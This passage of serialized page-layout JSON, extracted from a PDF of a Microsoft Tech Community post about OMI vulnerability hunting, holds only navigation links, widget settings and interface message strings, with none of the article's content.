var(--lia-bs-border-color)\",\"hamburgerBorder\":\"none\",\"dropdownPaddingX\":\"10px\",\"brandMarginRightSm\":\"10px\",\"linkBoxShadow\":\"none\",\"linkJustifyContent\":\"flex-start\",\"linkColor\":\"var(--lia-bs-body-color)\",\"collapseMenuDividerBg\":\"var(--lia-nav-link-color)\",\"dropdownPaddingTop\":\"10px\",\"controllerTextColor\":\"var(--lia-nav-controller-icon-color)\",\"controllerHighlightTextColor\":\"var(--lia-yiq-dark)\",\"background\":{\"imageAssetName\":\"\",\"color\":\"var(--lia-bs-white)\",\"size\":\"COVER\",\"repeat\":\"NO_REPEAT\",\"position\":\"CENTER_CENTER\",\"imageLastModified\":\"\"},\"linkBorderRadius\":\"var(-\r\n-lia-bs-border-radius-sm)\",\"linkHoverColor\":\"var(--lia-bs-body-color)\",\"position\":\"FIXED\",\"linkBorder\":\"none\",\"linkTextBorderBottomHover\":\"2px solid var(--lia-bs-primary)\",\"brandMarginRight\":\"30px\",\"hamburgerHoverColor\":\"var(--lia-nav-controller-icon-color)\",\"linkBorderHover\":\"none\",\"collapseMenuMarginLeft\":\"20px\",\"linkFontStyle\":\"NORMAL\",\"linkPaddingX\":\"10px\",\"controllerTextHoverColor\":\r\n-lia-nav-controller-icon-hover-color)\",\"paddingTop\":\"15px\",\"linkPaddingY\":\"5px\",\"linkTextTransform\":\"NONE\",\"dropdownBorderColor\":\"hsla(var(--lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l), 0.08)\",\"controllerBgHoverColor\":\"hsla(var(--lia-bs-black-h), var(--\r\nlia-bs-black-s), var(--lia-bs-black-l), 0.1)\",\"linkDropdownPaddingX\":\"var(--lia-nav-link-px)\",\"linkBgColor\":\"transparent\",\"linkDropdownPaddingY\":\"9px\",\"controllerIconColor\":\"var(--lia-bs-body-color)\",\"dropdownDividerMarginTop\":\"10px\",\"linkGap\":\"10px\",\"controllerIconHoverColor\":\"var(--lia-bs-body-color)\"},\"links\":{\"sideLinks\":[],\"logoLinks\":[],\"mainLinks\":[{\"children\":\r\n[],\"linkType\":\"INTERNAL\",\"id\":\"gxcuf89792\",\"params\":{},\"routeName\":\"CommunityPage\"},{\"children\":\r\n[],\"linkType\":\"EXTERNAL\",\"id\":\"community-hub-link\",\"url\":\"/Directory\",\"target\":\"SELF\"},{\"children\":\r\n[{\"linkType\":\"INTERNAL\",\"id\":\"Common-microsoft365-link\",\"params\":\r\n{\"categoryId\":\"microsoft365\"},\"routeName\":\"CategoryPage\"},{\"linkType\":\"INTERNAL\",\"id\":\"Common-windows-link\",\"params\":{\"categoryId\":\"Windows\"},\"routeName\":\"CategoryPage\"},{\"linkType\":\"INTERNAL\",\"id\":\"Common-microsoft-security-link\",\"params\":{\"categoryId\":\"microsoft-security\"},\"routeName\":\"CategoryPage\"},\r\n{\"linkType\":\"INTERNAL\",\"id\":\"Common-microsoft-teams-link\",\"params\":\r\n{\"categoryId\":\"MicrosoftTeams\"},\"routeName\":\"CategoryPage\"},{\"linkType\":\"INTERNAL\",\"id\":\"Common-azure-link\",\"params\":{\"categoryId\":\"Azure\"},\"routeName\":\"CategoryPage\"},{\"linkType\":\"INTERNAL\",\"id\":\"Common-https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 25 of 38\n\ncontent_management-link\",\"params\":{\"categoryId\":\"Content_Management\"},\"routeName\":\"CategoryPage\"},\r\n{\"linkType\":\"INTERNAL\",\"id\":\"Common-microsoftintune-link\",\"params\":\r\n{\"categoryId\":\"microsoftintune\"},\"routeName\":\"CategoryPage\"},{\"linkType\":\"INTERNAL\",\"id\":\"Common-exchange-link\",\"params\":{\"categoryId\":\"Exchange\"},\"routeName\":\"CategoryPage\"},{\"linkType\":\"INTERNAL\",\"id\":\"Common-windows-server-link\",\"params\":{\"categoryId\":\"Windows-Server\"},\"routeName\":\"CategoryPage\"},\r\n{\"linkType\":\"INTERNAL\",\"id\":\"Common-outlook-link\",\"params\":\r\n{\"categoryId\":\"Outlook\"},\"routeName\":\"CategoryPage\"},{\"linkType\":\"INTERNAL\",\"id\":\"Common-microsoft365-copilot-link\",\"params\":{\"categoryId\":\"Microsoft365Copilot\"},\"routeName\":\"CategoryPage\"},\r\n{\"linkType\":\"EXTERNAL\",\"id\":\"Common_Enntvz-view-all-products-link\",\"url\":\"/Directory\",\"target\":\"SELF\"}],\"linkType\":\"EXTERNAL\",\"id\":\"products-link\",\"url\":\"/\",\"target\":\"SELF\"},\r\n{\"children\":[{\"linkType\":\"INTERNAL\",\"id\":\"Common-education-sector-link\",\"params\":\r\n{\"categoryId\":\"EducationSector\"},\"routeName\":\"CategoryPage\"},{\"linkType\":\"INTERNAL\",\"id\":\"Common-partner-community-link\",\"params\":{\"categoryId\":\"PartnerCommunity\"},\"routeName\":\"CategoryPage\"},\r\n{\"linkType\":\"INTERNAL\",\"id\":\"Common-healthcare-and-life-sciences-link\",\"params\":\r\n{\"categoryId\":\"HealthcareAndLifeSciences\"},\"routeName\":\"CategoryPage\"},{\"linkType\":\"INTERNAL\",\"id\":\"Common-i-t-ops-talk-link\",\"params\":{\"categoryId\":\"ITOpsTalk\"},\"routeName\":\"CategoryPage\"},\r\n{\"linkType\":\"INTERNAL\",\"id\":\"Common-public-sector-link\",\"params\":\r\n{\"categoryId\":\"PublicSector\"},\"routeName\":\"CategoryPage\"},{\"linkType\":\"INTERNAL\",\"id\":\"Common-microsoftfor-nonprofits-link\",\"params\":{\"categoryId\":\"MicrosoftforNonprofits\"},\"routeName\":\"CategoryPage\"},\r\n{\"linkType\":\"INTERNAL\",\"id\":\"Common-io-t-link\",\"params\":{\"categoryId\":\"IoT\"},\"routeName\":\"CategoryPage\"},\r\n{\"linkType\":\"INTERNAL\",\"id\":\"Common-mvp-link\",\"params\":{\"categoryId\":\"mvp\"},\"routeName\":\"CategoryPage\"},\r\n{\"linkType\":\"INTERNAL\",\"id\":\"Common-microsoft-mechanics-link\",\"params\":\r\n{\"categoryId\":\"MicrosoftMechanics\"},\"routeName\":\"CategoryPage\"},{\"linkType\":\"INTERNAL\",\"id\":\"Common-driving-adoption-link\",\"params\":{\"categoryId\":\"DrivingAdoption\"},\"routeName\":\"CategoryPage\"},\r\n{\"linkType\":\"INTERNAL\",\"id\":\"Common-microsoft-learn-for-educators-link\",\"params\":{\"categoryId\":\"microsoft-learn-for-educators\"},\"routeName\":\"CategoryPage\"}],\"linkType\":\"EXTERNAL\",\"id\":\"topics-link\",\"url\":\"/\",\"target\":\"SELF\"},\r\n{\"children\":[],\"linkType\":\"EXTERNAL\",\"id\":\"all-blogs-link\",\"url\":\"/Blogs\",\"target\":\"SELF\"},{\"children\":\r\n[],\"linkType\":\"EXTERNAL\",\"id\":\"all-events-link\",\"url\":\"/Events\",\"target\":\"SELF\"},{\"children\":\r\n[{\"linkType\":\"INTERNAL\",\"id\":\"Skills-Hub-link\",\"params\":{\"categoryId\":\"skills-hub\"},\"routeName\":\"CategoryPage\"},\r\n{\"linkType\":\"INTERNAL\",\"id\":\"Skills-Hub-Blog\",\"params\":{\"boardId\":\"skills-hub-blog\",\"categoryId\":\"skills-hub\"},\"routeName\":\"BlogBoardPage\"},{\"linkType\":\"EXTERNAL\",\"id\":\"ms-learn-ext-LD\",\"url\":\"/category/skills-hub?\r\ntab=grouphub\",\"target\":\"BLANK\"},{\"linkType\":\"EXTERNAL\",\"id\":\"ms-learn-ext-dynamics\",\"url\":\"https://docs.microsoft.com/learn/dynamics365/?WT.mc_id=techcom_header-webpage-m365\",\"target\":\"BLANK\"},{\"linkType\":\"EXTERNAL\",\"id\":\"ms-learn-ext-m365\",\"url\":\"https://docs.microsoft.com/learn/m365/?wt.mc_id=techcom_header-webpage-m365\",\"target\":\"BLANK\"},\r\n{\"linkType\":\"EXTERNAL\",\"id\":\"ms-learn-ext-security\",\"url\":\"https://docs.microsoft.com/learn/topics/sci/?\r\nwt.mc_id=techcom_header-webpage-m365\",\"target\":\"BLANK\"},{\"linkType\":\"EXTERNAL\",\"id\":\"ms-learn-ext-pp\",\"url\":\"https://docs.microsoft.com/learn/powerplatform/?wt.mc_id=techcom_header-webpage-powerplatform\",\"target\":\"BLANK\"},{\"linkType\":\"EXTERNAL\",\"id\":\"ms-learn-ext-github\",\"url\":\"https://docs.microsoft.com/learn/github/?wt.mc_id=techcom_header-webpage-github\",\"target\":\"BLANK\"},\r\n{\"linkType\":\"EXTERNAL\",\"id\":\"ms-learn-ext-teams\",\"url\":\"https://docs.microsoft.com/learn/teams/?\r\nwt.mc_id=techcom_header-webpage-teams\",\"target\":\"BLANK\"},{\"linkType\":\"EXTERNAL\",\"id\":\"ms-learn-ext-net\",\"url\":\"https://docs.microsoft.com/learn/dotnet/?wt.mc_id=techcom_header-webpage-dotnet\",\"target\":\"BLANK\"},\r\n{\"linkType\":\"EXTERNAL\",\"id\":\"ms-learn-ext-azure\",\"url\":\"https://docs.microsoft.com/learn/azure/?\r\nWT.mc_id=techcom_header-webpage-m365\",\"target\":\"BLANK\"}],\"linkType\":\"INTERNAL\",\"id\":\"Skills-Hub\",\"params\":\r\n{\"categoryId\":\"skills-hub\"},\"routeName\":\"CategoryPage\"},{\"children\":[{\"linkType\":\"INTERNAL\",\"id\":\"Common-community-info-center-link\",\"params\":{\"categoryId\":\"Community-Info-Center\"},\"routeName\":\"CategoryPage\"},\r\n{\"linkType\":\"INTERNAL\",\"id\":\"Common-usergroups-link\",\"params\":\r\n{\"categoryId\":\"usergroups\"},\"routeName\":\"CategoryPage\"},{\"linkType\":\"INTERNAL\",\"id\":\"Common-community-news-desk-link\",\"params\":{\"categoryId\":\"CommunityNewsDesk\"},\"routeName\":\"CategoryPage\"},\r\n{\"linkType\":\"INTERNAL\",\"id\":\"Common-microsoft-global-community-initiative-link\",\"params\":{\"categoryId\":\"microsoft-global-community-initiative\"},\"routeName\":\"CategoryPage\"}],\"linkType\":\"INTERNAL\",\"id\":\"Common-gxcuf89792-\r\ncommunity\",\"params\":\r\n{},\"routeName\":\"CommunityPage\"}]},\"showSearchIcon\":true,\"languagePickerStyle\":\"iconAndLabel\"},\"__typename\":\"QuiltComponent\"},\r\n{\"id\":\"community.widget.breadcrumbWidget\",\"props\":{\"backgroundColor\":\"transparent\",\"linkHighlightColor\":\"var(--lia-bs-primary)\",\"visualEffects\":{\"showBottomBorder\":true},\"linkTextColor\":\"var(--lia-bs-gray-700)\"},\"__typename\":\"QuiltComponent\"},{\"id\":\"custom.widget.CommunityBanner\",\"props\":\r\n{\"widgetVisibility\":\"signedInOrAnonymous\",\"useTitle\":true,\"usePageWidth\":false,\"useBackground\":false,\"title\":\"\",\"lazyLoad\":false},\"__typename\":\"Qu\r\n{\"id\":\"custom.widget.ChatbotWidget\",\"props\":\r\n{\"customComponentId\":\"custom.widget.ChatbotWidget\",\"cDisplay_form\":true,\"useBackground\":false},\"__typename\":\"QuiltComponent\"},\r\n{\"id\":\"custom.widget.HeroBanner\",\"props\":\r\n{\"widgetVisibility\":\"signedInOrAnonymous\",\"usePageWidth\":false,\"useTitle\":true,\"cMax_items\":3,\"useBackground\":false,\"title\":\"\",\"lazyLoad\":false,\"w\r\n{\"backgroundImageProps\":\r\n{\"assetName\":null,\"backgroundSize\":\"COVER\",\"backgroundRepeat\":\"NO_REPEAT\",\"backgroundPosition\":\"CENTER_CENTER\",\"lastModified\":null,\"\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 26 of 38\n\n[{\"id\":\"custom.widget.SocialSharing\",\"props\":\r\n{\"widgetVisibility\":\"signedInOrAnonymous\",\"useTitle\":true,\"useBackground\":false,\"title\":\"\",\"lazyLoad\":false},\"__typename\":\"QuiltComponent\"},\r\n{\"id\":\"custom.widget.MicrosoftFooter\",\"props\":\r\n{\"widgetVisibility\":\"signedInOrAnonymous\",\"useTitle\":true,\"useBackground\":false,\"title\":\"\",\"lazyLoad\":false},\"__typename\":\"QuiltComponent\"}],\"__ty\r\ncomponents/common/ActionFeedback-1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/common/ActionFeedback-1775111751222\",\"value\":\r\n{\"joinedGroupHub.title\":\"Welcome\",\"joinedGroupHub.message\":\"You are now a member of this group and are subscribed\r\nto updates.\",\"groupHubInviteNotFound.title\":\"Invitation Not Found\",\"groupHubInviteNotFound.message\":\"Sorry, we could\r\nnot find your invitation to the group. The owner may have canceled the invite.\",\"groupHubNotFound.title\":\"Group Not\r\nFound\",\"groupHubNotFound.message\":\"The grouphub you tried to join does not exist. It may have been\r\ndeleted.\",\"existingGroupHubMember.title\":\"Already Joined\",\"existingGroupHubMember.message\":\"You are already a\r\nmember of this group.\",\"accountLocked.title\":\"Account Locked\",\"accountLocked.message\":\"Your account has been locked\r\ndue to multiple failed attempts. Try again in {lockoutTime} minutes.\",\"editedGroupHub.title\":\"Changes\r\nSaved\",\"editedGroupHub.message\":\"Your group has been\r\nupdated.\",\"leftGroupHub.title\":\"Goodbye\",\"leftGroupHub.message\":\"You are no longer a member of this group and will not\r\nreceive future updates.\",\"deletedGroupHub.title\":\"Deleted\",\"deletedGroupHub.message\":\"The group has been\r\ndeleted.\",\"groupHubCreated.title\":\"Group Created\",\"groupHubCreated.message\":\"{groupHubName} is ready to\r\nuse\",\"accountClosed.title\":\"Account Closed\",\"accountClosed.message\":\"The account has been closed and you will now be\r\nredirected to the homepage\",\"resetTokenExpired.title\":\"Reset Password Link has\r\nExpired\",\"resetTokenExpired.message\":\"Try resetting your password again\",\"invalidUrl.title\":\"Invalid\r\nURL\",\"invalidUrl.message\":\"The URL you're using is not recognized. Verify your URL and try\r\nagain.\",\"accountClosedForUser.title\":\"Account Closed\",\"accountClosedForUser.message\":\"{userName}'s account is\r\nclosed\",\"inviteTokenInvalid.title\":\"Invitation Invalid\",\"inviteTokenInvalid.message\":\"Your invitation to the community has\r\nbeen canceled or expired.\",\"inviteTokenError.title\":\"Invitation Verification Failed\",\"inviteTokenError.message\":\"The url you\r\nare utilizing is not recognized. Verify your URL and try again\",\"pageNotFound.title\":\"Access\r\nDenied\",\"pageNotFound.message\":\"You do not have access to this area of the community or it doesn't\r\nexist\",\"eventAttending.title\":\"Responded as Attending\",\"eventAttending.message\":\"You'll be notified when there's new\r\nactivity and reminded as the event approaches\",\"eventInterested.title\":\"Responded as\r\nInterested\",\"eventInterested.message\":\"You'll be notified when there's new activity and reminded as the event\r\napproaches\",\"eventNotFound.title\":\"Event Not Found\",\"eventNotFound.message\":\"The event you tried to respond to does\r\nnot exist.\",\"redirectToRelatedPage.title\":\"Showing Related Content\",\"redirectToRelatedPageForBaseUsers.title\":\"Showing\r\nRelated Content\",\"redirectToRelatedPageForBaseUsers.message\":\"The content you are trying to access is\r\narchived\",\"redirectToRelatedPage.message\":\"The content you are trying to access is\r\narchived\",\"relatedUrl.archivalLink.flyoutMessage\":\"The content you are trying to access is archived View Archived\r\nContent\"},\"localOverride\":false},\"CachedAsset:component:custom.widget.CommunityBanner-en-us-1774591586939\":\r\n{\"__typename\":\"CachedAsset\",\"id\":\"component:custom.widget.CommunityBanner-en-us-1774591586939\",\"value\":\r\n{\"component\":{\"id\":\"custom.widget.CommunityBanner\",\"template\":\r\n{\"id\":\"CommunityBanner\",\"markupLanguage\":\"REACT\",\"style\":null,\"texts\":null,\"defaults\":{\"config\":{\"applicablePages\":\r\n[],\"description\":null,\"fetchedContent\":null,\"__typename\":\"ComponentConfiguration\"},\"props\":\r\n[],\"__typename\":\"ComponentProperties\"},\"components\":\r\n[{\"id\":\"custom.widget.CommunityBanner\",\"form\":null,\"config\":null,\"props\":\r\n[],\"__typename\":\"Component\"}],\"grouping\":\"CUSTOM\",\"__typename\":\"ComponentTemplate\"},\"properties\":{\"config\":\r\n{\"applicablePages\":[],\"description\":null,\"fetchedContent\":null,\"__typename\":\"ComponentConfiguration\"},\"props\":\r\n[],\"__typename\":\"ComponentProperties\"},\"form\":null,\"__typename\":\"Component\",\"localOverride\":false},\"globalCss\":null,\"form\":null},\"localOverride\":\r\nen-us-1774591586939\":{\"__typename\":\"CachedAsset\",\"id\":\"component:custom.widget.ChatbotWidget-en-us-1774591586939\",\"value\":{\"component\":{\"id\":\"custom.widget.ChatbotWidget\",\"template\":\r\n{\"id\":\"ChatbotWidget\",\"markupLanguage\":\"REACT\",\"style\":null,\"texts\":{\"chatbot.references.title\":\"Related\r\nArticles\",\"chatbot.welcome.title\":\"Welcome!\",\"chatbot.welcome.description\":\"I'm here to help you explore and discover\r\ngreat content.\",\"chatbot.welcome.prompt\":\"Ask me a question or choose a suggestion below to get\r\nstarted:\",\"chatbot.welcome.cta\":\"Let's dive in—what would you like to discover today?\",\"chatbot.status.typing\":\"Assistant\r\nis typing…\",\"chatbot.status.error\":\"error\",\"chatbot.error.response\":\"Failed to get response. Please try\r\nagain.\",\"chatbot.error.processing\":\"There was an error processing your message.\",\"chatbot.error.configuration\":\"API URL\r\nnot configured\",\"chatbot.error.network\":\"Network error occurred. Please check your connection and try\r\nagain.\",\"chatbot.error.timeout\":\"Request timed out. Please try again.\",\"chatbot.error.emptyResponse\":\"I couldn't generate a\r\nresponse. Please try rephrasing your question.\",\"chatbot.buttons.send\":\"Send\",\"chatbot.buttons.close\":\"Close\r\nchat\",\"chatbot.buttons.newChat\":\"Start new chat\",\"chatbot.buttons.collapse\":\"Collapse chat\r\npanel\",\"chatbot.buttons.expand\":\"Expand chat panel\",\"chatbot.buttons.fullscreen\":\"Enter\r\nfullscreen\",\"chatbot.buttons.exitFullscreen\":\"Exit fullscreen\",\"chatbot.buttons.like\":\"Like this\r\nresponse\",\"chatbot.buttons.dislike\":\"Dislike this response\",\"chatbot.buttons.removeLike\":\"Remove\r\nlike\",\"chatbot.buttons.removeDislike\":\"Remove dislike\",\"chatbot.aria.chatInput\":\"Chat\r\ninput\",\"chatbot.aria.sendMessage\":\"Send message\",\"chatbot.aria.openChat\":\"Open chat\r\nassistant\",\"chatbot.aria.closeChat\":\"Close chat assistant\",\"chatbot.defaults.title\":\"Ask Tech\r\nCommunity\",\"chatbot.defaults.subtitle\":\"Ask questions – get answers\",\"chatbot.defaults.entryHeading\":\"Find\r\nanswers\",\"chatbot.defaults.entrySubtext\":\"Ask the agent\",\"chatbot.defaults.placeholder\":\"Type your\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 27 of 38\n\nmessage…\",\"chatbot.defaults.initialMessage\":\"Hi! I'm your assistant. Ask me something or pick a suggestion above to\r\nbegin.\",\"chatbot.suggestions.findBlogs\":\"Find insightful blogs\",\"chatbot.suggestions.exploreEvents\":\"Explore upcoming\r\nevents\",\"chatbot.suggestions.startJourney\":\"Start your journey with something new\",\"chatbot.dialog.endConversation\":\"End\r\nconversation\",\"chatbot.dialog.confirmEndConversation\":\"Do you want to end this conversation and start\r\nover?\",\"chatbot.dialog.endConversationButton\":\"End\r\nconversation\",\"chatbot.dialog.cancel\":\"Cancel\",\"chatbot.error.genericServiceUnavailable\":\"The service is currently\r\nunavailable. Please try again later.\",\"chatbot.error.noResults\":\"We could not find any information related to your query. Try\r\nrephrasing your query.\"},\"defaults\":{\"config\":{\"applicablePages\":\r\n[],\"description\":null,\"fetchedContent\":null,\"__typename\":\"ComponentConfiguration\"},\"props\":\r\n[],\"__typename\":\"ComponentProperties\"},\"components\":\r\n[{\"id\":\"custom.widget.ChatbotWidget\",\"form\":null,\"config\":null,\"props\":\r\n[],\"__typename\":\"Component\"}],\"grouping\":\"CUSTOM\",\"__typename\":\"ComponentTemplate\"},\"properties\":{\"config\":\r\n{\"applicablePages\":[],\"description\":null,\"fetchedContent\":null,\"__typename\":\"ComponentConfiguration\"},\"props\":\r\n[],\"__typename\":\"ComponentProperties\"},\"form\":null,\"__typename\":\"Component\",\"localOverride\":false},\"globalCss\":null,\"form\":null},\"localOverride\":\r\nen-us-1774591586939\":{\"__typename\":\"CachedAsset\",\"id\":\"component:custom.widget.HeroBanner-en-us-1774591586939\",\"value\":{\"component\":{\"id\":\"custom.widget.HeroBanner\",\"template\":\r\n{\"id\":\"HeroBanner\",\"markupLanguage\":\"REACT\",\"style\":null,\"texts\":{\"searchPlaceholderText\":\"Search this\r\ncommunity\",\"followActionText\":\"Follow\",\"unfollowActionText\":\"Following\",\"searchOnHoverText\":\"Please enter your\r\nsearch term(s) and then press return key to complete a search.\",\"blogs.sidebar.pagetitle\":\"Latest Blogs | Microsoft Tech\r\nCommunity\",\"followThisNode\":\"Follow this node\",\"unfollowThisNode\":\"Unfollow this\r\nnode\",\"customField.teamsLink.title\":\"Microsoft teams link\",\"customField.teamsLink.label\":\"Teams meeting\r\nurl\"},\"defaults\":{\"config\":{\"applicablePages\":\r\n[],\"description\":null,\"fetchedContent\":null,\"__typename\":\"ComponentConfiguration\"},\"props\":\r\n[{\"id\":\"max_items\",\"dataType\":\"NUMBER\",\"list\":false,\"defaultValue\":\"3\",\"label\":\"Max Items\",\"description\":\"The\r\nmaximum number of items to display in the\r\ncarousel\",\"possibleValues\":null,\"control\":\"INPUT\",\"__typename\":\"PropDefinition\"}],\"__typename\":\"ComponentProperties\"},\"components\":\r\n[{\"id\":\"custom.widget.HeroBanner\",\"form\":{\"fields\":\r\n[{\"id\":\"widgetChooser\",\"validation\":null,\"noValidation\":null,\"dataType\":\"STRING\",\"list\":null,\"control\":null,\"defaultValue\":null,\"label\":null,\"description\r\n{\"id\":\"title\",\"validation\":null,\"noValidation\":null,\"dataType\":\"STRING\",\"list\":null,\"control\":null,\"defaultValue\":null,\"label\":null,\"description\":null,\"possi\r\n{\"id\":\"useTitle\",\"validation\":null,\"noValidation\":null,\"dataType\":\"BOOLEAN\",\"list\":null,\"control\":null,\"defaultValue\":null,\"label\":null,\"description\":nul\r\n{\"id\":\"useBackground\",\"validation\":null,\"noValidation\":null,\"dataType\":\"BOOLEAN\",\"list\":null,\"control\":null,\"defaultValue\":null,\"label\":null,\"descripti\r\n{\"id\":\"widgetVisibility\",\"validation\":null,\"noValidation\":null,\"dataType\":\"STRING\",\"list\":null,\"control\":null,\"defaultValue\":null,\"label\":null,\"description\r\n{\"id\":\"moreOptions\",\"validation\":null,\"noValidation\":null,\"dataType\":\"STRING\",\"list\":null,\"control\":null,\"defaultValue\":null,\"label\":null,\"description\":n\r\n{\"id\":\"cMax_items\",\"validation\":null,\"noValidation\":null,\"dataType\":\"NUMBER\",\"list\":false,\"control\":\"INPUT\",\"defaultValue\":\"3\",\"label\":\"Max\r\nItems\",\"description\":\"The maximum number of items to display in the\r\ncarousel\",\"possibleValues\":null,\"__typename\":\"FormField\"}],\"layout\":{\"rows\":\r\n[{\"id\":\"widgetChooserGroup\",\"type\":\"fieldset\",\"as\":null,\"items\":\r\n[{\"id\":\"widgetChooser\",\"className\":null,\"__typename\":\"FormFieldRef\"}],\"props\":null,\"legend\":null,\"description\":null,\"className\":null,\"viewVariant\":\r\n{\"id\":\"titleGroup\",\"type\":\"fieldset\",\"as\":null,\"items\":[{\"id\":\"title\",\"className\":null,\"__typename\":\"FormFieldRef\"},\r\n{\"id\":\"useTitle\",\"className\":null,\"__typename\":\"FormFieldRef\"}],\"props\":null,\"legend\":null,\"description\":null,\"className\":null,\"viewVariant\":null,\"to\r\n{\"id\":\"useBackground\",\"type\":\"fieldset\",\"as\":null,\"items\":\r\n[{\"id\":\"useBackground\",\"className\":null,\"__typename\":\"FormFieldRef\"}],\"props\":null,\"legend\":null,\"description\":null,\"className\":null,\"viewVariant\"\r\n{\"id\":\"widgetVisibility\",\"type\":\"fieldset\",\"as\":null,\"items\":\r\n[{\"id\":\"widgetVisibility\",\"className\":null,\"__typename\":\"FormFieldRef\"}],\"props\":null,\"legend\":null,\"description\":null,\"className\":null,\"viewVariant\"\r\n{\"id\":\"moreOptionsGroup\",\"type\":\"fieldset\",\"as\":null,\"items\":\r\n[{\"id\":\"moreOptions\",\"className\":null,\"__typename\":\"FormFieldRef\"}],\"props\":null,\"legend\":null,\"description\":null,\"className\":null,\"viewVariant\":nu\r\n{\"id\":\"componentPropsGroup\",\"type\":\"fieldset\",\"as\":null,\"items\":\r\n[{\"id\":\"cMax_items\",\"className\":null,\"__typename\":\"FormFieldRef\"}],\"props\":null,\"legend\":null,\"description\":null,\"className\":null,\"viewVariant\":nu\r\n[],\"__typename\":\"Component\"}],\"grouping\":\"CUSTOM\",\"__typename\":\"ComponentTemplate\"},\"properties\":{\"config\":\r\n{\"applicablePages\":[],\"description\":null,\"fetchedContent\":null,\"__typename\":\"ComponentConfiguration\"},\"props\":\r\n[{\"id\":\"max_items\",\"dataType\":\"NUMBER\",\"list\":false,\"defaultValue\":\"3\",\"label\":\"Max Items\",\"description\":\"The\r\nmaximum number of items to display in the\r\ncarousel\",\"possibleValues\":null,\"control\":\"INPUT\",\"__typename\":\"PropDefinition\"}],\"__typename\":\"ComponentProperties\"},\"form\":\r\n{\"fields\":\r\n[{\"id\":\"widgetChooser\",\"validation\":null,\"noValidation\":null,\"dataType\":\"STRING\",\"list\":null,\"control\":null,\"defaultValue\":null,\"label\":null,\"description\r\n{\"id\":\"title\",\"validation\":null,\"noValidation\":null,\"dataType\":\"STRING\",\"list\":null,\"control\":null,\"defaultValue\":null,\"label\":null,\"description\":null,\"possi\r\n{\"id\":\"useTitle\",\"validation\":null,\"noValidation\":null,\"dataType\":\"BOOLEAN\",\"list\":null,\"control\":null,\"defaultValue\":null,\"label\":null,\"description\":nul\r\n{\"id\":\"useBackground\",\"validation\":null,\"noValidation\":null,\"dataType\":\"BOOLEAN\",\"list\":null,\"control\":null,\"defaultValue\":null,\"label\":null,\"descripti\r\n{\"id\":\"widgetVisibility\",\"validation\":null,\"noValidation\":null,\"dataType\":\"STRING\",\"list\":null,\"control\":null,\"defaultValue\":null,\"label\":null,\"description\r\n{\"id\":\"moreOptions\",\"validation\":null,\"noValidation\":null,\"dataType\":\"STRING\",\"list\":null,\"control\":null,\"defaultValue\":null,\"label\":null,\"description\":n\r\n{\"id\":\"cMax_items\",\"validation\":null,\"noValidation\":null,\"dataType\":\"NUMBER\",\"list\":false,\"control\":\"INPUT\",\"defaultValue\":\"3\",\"label\":\"Max\r\nItems\",\"description\":\"The maximum number of items to display in the\r\ncarousel\",\"possibleValues\":null,\"__typename\":\"FormField\"}],\"layout\":{\"rows\":\r\n[{\"id\":\"widgetChooserGroup\",\"type\":\"fieldset\",\"as\":null,\"items\":\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 28 of 38\n\n[{\"id\":\"widgetChooser\",\"className\":null,\"__typename\":\"FormFieldRef\"}],\"props\":null,\"legend\":null,\"description\":null,\"className\":null,\"viewVariant\":\r\n{\"id\":\"titleGroup\",\"type\":\"fieldset\",\"as\":null,\"items\":[{\"id\":\"title\",\"className\":null,\"__typename\":\"FormFieldRef\"},\r\n{\"id\":\"useTitle\",\"className\":null,\"__typename\":\"FormFieldRef\"}],\"props\":null,\"legend\":null,\"description\":null,\"className\":null,\"viewVariant\":null,\"to\r\n{\"id\":\"useBackground\",\"type\":\"fieldset\",\"as\":null,\"items\":\r\n[{\"id\":\"useBackground\",\"className\":null,\"__typename\":\"FormFieldRef\"}],\"props\":null,\"legend\":null,\"description\":null,\"className\":null,\"viewVariant\"\r\n{\"id\":\"widgetVisibility\",\"type\":\"fieldset\",\"as\":null,\"items\":\r\n[{\"id\":\"widgetVisibility\",\"className\":null,\"__typename\":\"FormFieldRef\"}],\"props\":null,\"legend\":null,\"description\":null,\"className\":null,\"viewVariant\"\r\n{\"id\":\"moreOptionsGroup\",\"type\":\"fieldset\",\"as\":null,\"items\":\r\n[{\"id\":\"moreOptions\",\"className\":null,\"__typename\":\"FormFieldRef\"}],\"props\":null,\"legend\":null,\"description\":null,\"className\":null,\"viewVariant\":nu\r\n{\"id\":\"componentPropsGroup\",\"type\":\"fieldset\",\"as\":null,\"items\":\r\n[{\"id\":\"cMax_items\",\"className\":null,\"__typename\":\"FormFieldRef\"}],\"props\":null,\"legend\":null,\"description\":null,\"className\":null,\"viewVariant\":nu\r\n{\"fields\":\r\n[{\"id\":\"widgetChooser\",\"validation\":null,\"noValidation\":null,\"dataType\":\"STRING\",\"list\":null,\"control\":null,\"defaultValue\":null,\"label\":null,\"description\r\n{\"id\":\"title\",\"validation\":null,\"noValidation\":null,\"dataType\":\"STRING\",\"list\":null,\"control\":null,\"defaultValue\":null,\"label\":null,\"description\":null,\"possi\r\n{\"id\":\"useTitle\",\"validation\":null,\"noValidation\":null,\"dataType\":\"BOOLEAN\",\"list\":null,\"control\":null,\"defaultValue\":null,\"label\":null,\"description\":nul\r\n{\"id\":\"useBackground\",\"validation\":null,\"noValidation\":null,\"dataType\":\"BOOLEAN\",\"list\":null,\"control\":null,\"defaultValue\":null,\"label\":null,\"descripti\r\n{\"id\":\"widgetVisibility\",\"validation\":null,\"noValidation\":null,\"dataType\":\"STRING\",\"list\":null,\"control\":null,\"defaultValue\":null,\"label\":null,\"description\r\n{\"id\":\"moreOptions\",\"validation\":null,\"noValidation\":null,\"dataType\":\"STRING\",\"list\":null,\"control\":null,\"defaultValue\":null,\"label\":null,\"description\":n\r\n{\"id\":\"cMax_items\",\"validation\":null,\"noValidation\":null,\"dataType\":\"NUMBER\",\"list\":false,\"control\":\"INPUT\",\"defaultValue\":\"3\",\"label\":\"Max\r\nItems\",\"description\":\"The maximum number of items to display in 